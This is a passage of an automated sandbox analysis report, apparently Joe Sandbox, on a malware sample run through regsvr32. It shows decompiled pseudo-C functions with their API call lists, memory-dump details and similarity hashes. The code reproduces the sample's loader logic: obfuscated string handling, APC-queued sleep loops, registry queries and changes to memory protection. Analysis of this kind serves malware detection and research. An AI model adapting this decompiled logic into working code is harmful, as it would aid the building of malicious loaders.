                							L11:
                							return _a4;
                						}
                						_t52 = _a16;
                						 *_t49 = _a16;
                						_t50 = _v8;
                						 *_t43 = E031F6576(_t52, _t50); // executed
                						_t30 = E031F4F81(_t50, _t52); // executed
                						if(_t30 != 0) {
                							 *_a8 = _t50;
                							 *_a12 = _t30;
                							if( *0x31fa2a4 < 5) {
                								 *0x31fa2a4 =  *0x31fa2a4 & 0x00000000;
                							}
                							goto L11;
                						}
                						_a4 = 0xbf;
                						E031F51B1();
                						HeapFree( *0x31fa290, 0, _t50);
                						goto L10;
                					}
                					_t37 = E031F74A5(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
                					L5:
                					_a4 = _t37;
                					goto L7;
                				}
                				if(RtlAllocateHeap() == 0) {
                					goto L6;
                				}
                				_t37 = E031F4062(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38);
                				goto L5;
                			}

                APIs
                • wsprintfA.USER32 ref: 031F7275
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031F729A
                  • Part of subcall function 031F4062: GetTickCount.KERNEL32 ref: 031F4076
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F40C6
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F40E3
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F4103
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F412F
                  • Part of subcall function 031F4062: HeapFree.KERNEL32(00000000,00000000), ref: 031F4141
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F4162
                  • Part of subcall function 031F4062: HeapFree.KERNEL32(00000000,00000000), ref: 031F4172
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031F72BC
                • HeapFree.KERNEL32(00000000,?,?), ref: 031F7320
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$Allocate$CountTick
                • String ID: Ut
                • API String ID: 1428766365-8415677
                • Opcode ID: b839e40b71dc505b0cad6b468e2a62a2448ca102e4f8d1981db3533d2c82d1e8
                • Instruction ID: c6e459f2097473c9749b3b82d55ec1827bb4c491b1c092fd250595ca4f9b78d0
                • Opcode Fuzzy Hash: b839e40b71dc505b0cad6b468e2a62a2448ca102e4f8d1981db3533d2c82d1e8
                • Instruction Fuzzy Hash: 4D31F675600219AFDB05EF64D984A9A7BBCFF0D394F144016FA0AEB244DB34E594CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E031F219A(void** __esi) {
                				intOrPtr _v0;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				void* _t8;
                				void* _t9;
                				intOrPtr _t10;
                				void* _t11;
                				void** _t13;
                
                				_t13 = __esi;
                				_t4 =  *0x31fa384; // 0x56095b0
                				__imp__(_t4 + 0x40);
                				while(1) {
                					_t6 =  *0x31fa384; // 0x56095b0
                					_t1 = _t6 + 0x58; // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t8 =  *_t13;
                				if(_t8 != 0 && _t8 != 0x31fa004) {
                					HeapFree( *0x31fa290, 0, _t8);
                				}
                				_t9 = E031F1590(_v0, _t13); // executed
                				_t13[1] = _t9;
                				_t10 =  *0x31fa384; // 0x56095b0
                				_t11 = _t10 + 0x40;
                				__imp__(_t11);
                				return _t11;
                			}

                APIs
                • RtlEnterCriticalSection.NTDLL(05609570), ref: 031F21A3
                • Sleep.KERNEL32(0000000A), ref: 031F21AD
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F21D5
                • RtlLeaveCriticalSection.NTDLL(05609570), ref: 031F21F1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Ut
                • API String ID: 58946197-8415677
                • Opcode ID: 5990163c10ee26d4135f1073c056614bc38b0ecaa8f46410eaa3844d34fb40a4
                • Instruction ID: 1f3c96dcf4837ffdb49bc8471d0870c2a4df6e06ffe099c9c2bb830ac668be66
                • Opcode Fuzzy Hash: 5990163c10ee26d4135f1073c056614bc38b0ecaa8f46410eaa3844d34fb40a4
                • Instruction Fuzzy Hash: 00F0F875204240AFE728FB28E958F167BA8EF0D740B094814FA0ED6664D739D8D1CF29
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E031F34A2(signed int __edx) {
                				signed int _v8;
                				long _v12;
                				CHAR* _v16;
                				long _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t21;
                				CHAR* _t22;
                				CHAR* _t25;
                				intOrPtr _t26;
                				void* _t27;
                				void* _t31;
                				void* _t32;
                				CHAR* _t36;
                				CHAR* _t42;
                				CHAR* _t43;
                				CHAR* _t44;
                				void* _t49;
                				void* _t51;
                				signed char _t56;
                				intOrPtr _t58;
                				signed int _t59;
                				void* _t63;
                				CHAR* _t67;
                				CHAR* _t68;
                				char* _t69;
                				void* _t70;
                
                				_t61 = __edx;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_t21 = E031F3B98();
                				if(_t21 != 0) {
                					_t59 =  *0x31fa2b4; // 0x4000000a
                					_t55 = (_t59 & 0xf0000000) + _t21;
                					 *0x31fa2b4 = (_t59 & 0xf0000000) + _t21;
                				}
                				_t22 =  *0x31fa148(0, 2);
                				_v16 = _t22;
                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                					_t25 = E031F5AAB( &_v8,  &_v20); // executed
                					_t54 = _t25;
                					_t26 =  *0x31fa2d8; // 0x240d5a8
                					if( *0x31fa2b4 > 5) {
                						_t8 = _t26 + 0x31fb5cd; // 0x4d283a53
                						_t27 = _t8;
                					} else {
                						_t7 = _t26 + 0x31fb9f9; // 0x44283a44
                						_t27 = _t7;
                					}
                					E031F6CD7(_t27, _t27);
                					_t31 = E031F30FD(_t61,  &_v20,  &_v12); // executed
                					if(_t31 == 0) {
                						CloseHandle(_v20);
                					}
                					_t63 = 5;
                					if(_t54 != _t63) {
                						 *0x31fa2c8 =  *0x31fa2c8 ^ 0x81bbe65d;
                						_t32 = E031F2114(0x60);
                						__eflags = _t32;
                						 *0x31fa384 = _t32;
                						if(_t32 == 0) {
                							_push(8);
                							_pop(0);
                						} else {
                							memset(_t32, 0, 0x60);
                							_t49 =  *0x31fa384; // 0x56095b0
                							_t70 = _t70 + 0xc;
                							__imp__(_t49 + 0x40);
                							_t51 =  *0x31fa384; // 0x56095b0
                							 *_t51 = 0x31fb823;
                						}
                						__eflags = 0;
                						_t54 = 0;
                						if(0 == 0) {
                							_t36 = RtlAllocateHeap( *0x31fa290, 0, 0x43);
                							__eflags = _t36;
                							 *0x31fa320 = _t36;
                							if(_t36 == 0) {
                								_push(8);
                								_pop(0);
                							} else {
                								_t56 =  *0x31fa2b4; // 0x4000000a
                								_t61 = _t56 & 0x000000ff;
                								_t58 =  *0x31fa2d8; // 0x240d5a8
                								_t13 = _t58 + 0x31fb55a; // 0x697a6f4d
                								_t55 = _t13;
                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x31f92ab);
                							}
                							__eflags = 0;
                							_t54 = 0;
                							if(0 == 0) {
                								asm("sbb eax, eax");
                								E031F5F8B( ~_v8 &  *0x31fa2c8, 0x31fa010); // executed
                								_t42 = E031F4BB3(0, _t55, _t63, 0x31fa010); // executed
                								_t54 = _t42;
                								__eflags = _t54;
                								if(_t54 != 0) {
                									goto L30;
                								}
                								_t43 = E031F33AC(); // executed
                								__eflags = _t43;
                								if(_t43 != 0) {
                									__eflags = _v8;
                									_t67 = _v12;
                									if(_v8 != 0) {
                										L29:
                										_t44 = E031F541F(_t61, _t67, _v8); // executed
                										_t54 = _t44;
                										goto L30;
                									}
                									__eflags = _t67;
                									if(__eflags == 0) {
                										goto L30;
                									}
                									_t54 = E031F1E0F(__eflags,  &(_t67[4]));
                									__eflags = _t54;
                									if(_t54 == 0) {
                										goto L30;
                									}
                									goto L29;
                								}
                								_t54 = 8;
                							}
                						}
                					} else {
                						_t68 = _v12;
                						if(_t68 == 0) {
                							L30:
                							if(_v16 == 0 || _v16 == 1) {
                								 *0x31fa14c(); // executed
                							}
                							goto L34;
                						}
                						_t69 =  &(_t68[4]);
                						do {
                						} while (E031F6096(_t63, _t69, 0, 1) == 0x4c7);
                					}
                					goto L30;
                				} else {
                					_t54 = _t22;
                					L34:
                					return _t54;
                				}
                			}

                APIs
                  • Part of subcall function 031F3B98: GetModuleHandleA.KERNEL32(4C44544E,00000000,031F34BA,00000001), ref: 031F3BA7
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 031F3537
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • memset.NTDLL ref: 031F3587
                • RtlInitializeCriticalSection.NTDLL(05609570), ref: 031F3598
                  • Part of subcall function 031F1E0F: memset.NTDLL ref: 031F1E29
                  • Part of subcall function 031F1E0F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 031F1E6F
                  • Part of subcall function 031F1E0F: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 031F1E7A
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 031F35C3
                • wsprintfA.USER32 ref: 031F35F3
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                • String ID:
                • API String ID: 4246211962-0
                • Opcode ID: 5bdeec22c0df2c068df4aae5d290acba7474bd4419ce2cb3336b96b05aace3e4
                • Instruction ID: b97aea7d283711a786d36df861b2d77a6f604ade0a37744bc57066c65766aed3
                • Opcode Fuzzy Hash: 5bdeec22c0df2c068df4aae5d290acba7474bd4419ce2cb3336b96b05aace3e4
                • Instruction Fuzzy Hash: DF51F679B04214AFDB55FBA8D884F6E77A8EF0C750F180865E715DB244E778D6808FA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E031F284F(signed int __eax, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				signed int _v20;
                				intOrPtr _t81;
                				char _t83;
                				signed int _t90;
                				signed int _t97;
                				signed int _t99;
                				char _t101;
                				unsigned int _t102;
                				intOrPtr _t103;
                				char* _t107;
                				signed int _t110;
                				signed int _t113;
                				signed int _t118;
                				signed int _t122;
                				intOrPtr _t124;
                
                				_t102 = _a8;
                				_t118 = 0;
                				_v20 = __eax;
                				_t122 = (_t102 >> 2) + 1;
                				_v8 = 0;
                				_a8 = 0;
                				_t81 = E031F2114(_t122 << 2);
                				_v16 = _t81;
                				if(_t81 == 0) {
                					_push(8);
                					_pop(0);
                					L37:
                					return 0;
                				}
                				_t107 = _a4;
                				_a4 = _t102;
                				_t113 = 0;
                				while(1) {
                					_t83 =  *_t107;
                					if(_t83 == 0) {
                						break;
                					}
                					if(_t83 == 0xd || _t83 == 0xa) {
                						if(_t118 != 0) {
                							if(_t118 > _v8) {
                								_v8 = _t118;
                							}
                							_a8 = _a8 + 1;
                							_t118 = 0;
                						}
                						 *_t107 = 0;
                						goto L16;
                					} else {
                						if(_t118 != 0) {
                							L10:
                							_t118 = _t118 + 1;
                							L16:
                							_t107 = _t107 + 1;
                							_t15 =  &_a4;
                							 *_t15 = _a4 - 1;
                							if( *_t15 != 0) {
                								continue;
                							}
                							break;
                						}
                						if(_t113 == _t122) {
                							L21:
                							if(_a8 <= 0x20) {
                								_push(0xb);
                								L34:
                								_pop(0);
                								L35:
                								E031F2C11(_v16);
                								goto L37;
                							}
                							_t24 = _v8 + 5; // 0xcdd8d2f8
                							_t103 = E031F2114((_v8 + _t24) * _a8 + 4);
                							if(_t103 == 0) {
                								_push(8);
                								goto L34;
                							}
                							_t90 = _a8;
                							_a4 = _a4 & 0x00000000;
                							_v8 = _v8 & 0x00000000;
                							_t124 = _t103 + _t90 * 4;
                							if(_t90 <= 0) {
                								L31:
                								 *0x31fa2d0 = _t103;
                								goto L35;
                							}
                							do {
                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                								_v12 = _v12 & 0x00000000;
                								if(_a4 <= 0) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t99 = _v12;
                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                									if(_t99 == 0) {
                										break;
                									}
                									_v12 = _v12 + 1;
                									if(_v12 < _a4) {
                										continue;
                									}
                									goto L30;
                								}
                								_v8 = _v8 - 1;
                								L30:
                								_t97 = _a4;
                								_a4 = _a4 + 1;
                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                								__imp__(_t124);
                								_v8 = _v8 + 1;
                								_t124 = _t124 + _t97 + 1;
                							} while (_v8 < _a8);
                							goto L31;
                						}
                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                						_t101 = _t83;
                						if(_t83 - 0x61 <= 0x19) {
                							_t101 = _t101 - 0x20;
                						}
                						 *_t107 = _t101;
                						_t113 = _t113 + 1;
                						goto L10;
                					}
                				}
                				if(_t118 != 0) {
                					if(_t118 > _v8) {
                						_v8 = _t118;
                					}
                					_a8 = _a8 + 1;
                				}
                				goto L21;
                			}

                APIs
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 031F294C
                • lstrcat.KERNEL32(69B25F45,00000020), ref: 031F2961
                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 031F2978
                • lstrlen.KERNEL32(69B25F45), ref: 031F299C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 025cf159b337dcfadfe680d10256fb59430d144f8f97df70dabfefbcf39f353d
                • Instruction ID: e9845fec5cfbe77c9a31215dac121fab8d839aada0501aac106ee1395db922b0
                • Opcode Fuzzy Hash: 025cf159b337dcfadfe680d10256fb59430d144f8f97df70dabfefbcf39f353d
                • Instruction Fuzzy Hash: FF51B339A00218EFDF25DF99C4846ADFBB5FF49310F19885AEA559B205C7709642CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F57E8(signed int _a4, signed int* _a8) {
                				void* __ecx;
                				void* __edi;
                				signed int _t6;
                				intOrPtr _t8;
                				intOrPtr _t12;
                				long _t14;
                				void* _t18;
                				WCHAR* _t19;
                				long _t20;
                				void* _t25;
                				void* _t26;
                				signed int* _t28;
                				CHAR* _t30;
                				long _t31;
                				WCHAR** _t32;
                
                				_t6 =  *0x31fa2c8; // 0xd448b889
                				_t32 = _a4;
                				_a4 = _t6 ^ 0x109a6410;
                				_t8 =  *0x31fa2d8; // 0x240d5a8
                				_t3 = _t8 + 0x31fb876; // 0x61636f4c
                				_t25 = 0;
                				_t30 = E031F3FEB(_t3, 1);
                				if(_t30 != 0) {
                					_t25 = CreateEventA(0x31fa304, 1, 0, _t30);
                					E031F2C11(_t30);
                				}
                				_t12 =  *0x31fa2b4; // 0x4000000a
                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                					L12:
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 =  *_t28 | 0x00000001;
                					}
                					_t14 = E031F1212(_t32, _t26); // executed
                					_t31 = _t14;
                					if(_t31 == 0 && _t25 != 0) {
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                					}
                					if(_t28 != 0 && _t31 != 0) {
                						 *_t28 =  *_t28 & 0xfffffffe;
                					}
                					goto L20;
                				} else {
                					_t18 = E031F2130(); // executed
                					if(_t18 != 0) {
                						goto L12;
                					}
                					_t19 = StrChrW( *_t32, 0x20);
                					if(_t19 != 0) {
                						 *_t19 = 0;
                						_t19 =  &(_t19[1]);
                					}
                					_t20 = E031F6096(0,  *_t32, _t19, 0); // executed
                					_t31 = _t20;
                					if(_t31 == 0) {
                						if(_t25 == 0) {
                							L22:
                							return _t31;
                						}
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                						if(_t31 == 0) {
                							L20:
                							if(_t25 != 0) {
                								CloseHandle(_t25);
                							}
                							goto L22;
                						}
                					}
                					goto L12;
                				}
                			}


                APIs
                  • Part of subcall function 031F3FEB: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05609B30,00000000,?,?,69B25F44,00000005,031FA010,4D283A53,?,?), ref: 031F4021
                  • Part of subcall function 031F3FEB: lstrcpy.KERNEL32(00000000,00000000), ref: 031F4045
                  • Part of subcall function 031F3FEB: lstrcat.KERNEL32(00000000,00000000), ref: 031F404D
                • CreateEventA.KERNEL32(031FA304,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F5829
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                • StrChrW.SHLWAPI(031F61CB,00000020,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F585C
                • WaitForSingleObject.KERNEL32(00000000,00004E20,031F61CB,00000000,00000000,?,00000000,?,031F61CB,?,?,?), ref: 031F5887
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F58B5
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F58CD
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 0523e2859ced926530c8cd0ce97d98898210d7e96d1f1e7e6f2bfe6b37718e05
                • Instruction ID: ee375fe5ad04fa5715971b4a08caa7b3fd88b8de0a1f574edf033ed40799057c
                • Opcode Fuzzy Hash: 0523e2859ced926530c8cd0ce97d98898210d7e96d1f1e7e6f2bfe6b37718e05
                • Instruction Fuzzy Hash: 4921F8326407156FC731EAAA9C84A6BB3AEEF8EA10F1D0625FF46DB104DB71C8414B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCD0E6: RegCreateKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD0FB
                  • Part of subcall function 04BCD0E6: lstrlen.KERNEL32(0624B7F0,00000000,00000000,04BED06E,?,?,?,04BC902F,00000001,?), ref: 04BCD124
                • RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                • RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                • RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                • HeapFree.KERNEL32(00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?), ref: 04BCBCB3
                • RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                • String ID:
                • API String ID: 1633053242-0
                • Opcode ID: 05a1ec3b20b7b79c1b184b0c4a1cd58d1f83a9ae18b58bb20f28fd83d53fe78f
                • Instruction ID: 15273c4b9e6baed1dcffd6662a58c22a96a10f689351dd5bb7b121a35ee389e4
                • Opcode Fuzzy Hash: 05a1ec3b20b7b79c1b184b0c4a1cd58d1f83a9ae18b58bb20f28fd83d53fe78f
                • Instruction Fuzzy Hash: 5E1119B2504109FFDB019FA6EDC6CAF7B7EFB88254B10046AF91197210EA71AD909B70
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E031F2F14(void* __ecx, void* __edi, intOrPtr _a4) {
                				unsigned int _v8;
                				void* _v12;
                				long _t15;
                				long _t16;
                				signed int _t18;
                				signed int _t19;
                				unsigned int _t21;
                				unsigned int _t26;
                
                				asm("stosd");
                				_v12 = _v12 | 0xffffffff;
                				while(1) {
                					_t15 = QueueUserAPC(E031F2702, GetCurrentThread(),  &_v12); // executed
                					if(_t15 == 0) {
                						break;
                					}
                					_t26 = _v8;
                					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
                					_push(0);
                					_push(0x13);
                					_push(_t26 >> 5);
                					_push(_t18);
                					L031F81DA();
                					_push(1);
                					_t19 = 3;
                					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
                					_t16 = E031F6F25(_a4, (_t21 >> 6) + _t18);
                					if(_t16 == 1) {
                						continue;
                					} else {
                					}
                					L5:
                					return _t16;
                				}
                				_t16 = GetLastError();
                				goto L5;
                			}

                APIs
                • GetCurrentThread.KERNEL32 ref: 031F2F2A
                • QueueUserAPC.KERNELBASE(031F2702,00000000,?,?,?,031F6D70,?,?), ref: 031F2F36
                • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 031F2F53
                • SleepEx.KERNELBASE(00000003,00000001,?,?,?,031F6D70,?,?), ref: 031F2F67
                  • Part of subcall function 031F6F25: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 031F6F84
                • GetLastError.KERNEL32(?,?,?,031F6D70,?,?), ref: 031F2F82
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                • String ID:
                • API String ID: 2952296216-0
                • Opcode ID: d3a09c5218f26c5d8907b7c34f80855f12118f3e77f1a438075607de699cc3ba
                • Instruction ID: 1b62aaa57b289211795bd16f19a6f6557452de3b2c1b493c4747c3c7c49196cf
                • Opcode Fuzzy Hash: d3a09c5218f26c5d8907b7c34f80855f12118f3e77f1a438075607de699cc3ba
                • Instruction Fuzzy Hash: AD0167B6A50214BFD718EAA4DC1EFEE767CE748710F040654F612D6180D7B0D681C660
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6), ref: 04BD7279
                • GetLastError.KERNEL32(?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD7281
                • VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F), ref: 04BD7298
                • VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7), ref: 04BD72BD
                • SetLastError.KERNEL32(00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD72C6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$ErrorLastProtect$Query
                • String ID:
                • API String ID: 148356745-0
                • Opcode ID: 344188ca394a8f7a223e62d0a7f9b4b153405c3609d27732d71213dfa5fc67ca
                • Instruction ID: b54377e7d314b22db976d2a1c4662b1465231b142c650cf4b82ed35fa39237b7
                • Opcode Fuzzy Hash: 344188ca394a8f7a223e62d0a7f9b4b153405c3609d27732d71213dfa5fc67ca
                • Instruction Fuzzy Hash: F0012976500209EF9F11AF96DC48CDABBB9EB4D2507004466F901D7211EB71EA149B70
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F5CF6(void* __edx) {
                				void* _v8;
                				int _v12;
                				WCHAR* _v16;
                				void* __edi;
                				void* __esi;
                				void* _t23;
                				intOrPtr _t24;
                				void* _t26;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				void* _t37;
                				intOrPtr _t38;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t50;
                				void* _t52;
                
                				_t50 = __edx;
                				_v12 = 0;
                				_t23 = E031F3B1B(0,  &_v8); // executed
                				if(_t23 != 0) {
                					_v8 = 0;
                				}
                				_t24 =  *0x31fa2d8; // 0x240d5a8
                				_t4 = _t24 + 0x31fbe38; // 0x56093e0
                				_t5 = _t24 + 0x31fbde0; // 0x4f0053
                				_t26 = E031F71E5( &_v16, _v8, _t5, _t4); // executed
                				_t45 = _t26;
                				if(_t45 == 0) {
                					StrToIntExW(_v16, 0,  &_v12);
                					_t45 = 8;
                					if(_v12 < _t45) {
                						_t45 = 1;
                						__eflags = 1;
                					} else {
                						_t32 =  *0x31fa2d8; // 0x240d5a8
                						_t11 = _t32 + 0x31fbe2c; // 0x56093d4
                						_t48 = _t11;
                						_t12 = _t32 + 0x31fbde0; // 0x4f0053
                						_t52 = E031F6C7B(_t11, _t12, _t11);
                						_t59 = _t52;
                						if(_t52 != 0) {
                							_t35 =  *0x31fa2d8; // 0x240d5a8
                							_t13 = _t35 + 0x31fbe76; // 0x30314549
                							_t37 = E031F36C5(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                							if(_t37 == 0) {
                								_t61 =  *0x31fa2b4 - 6;
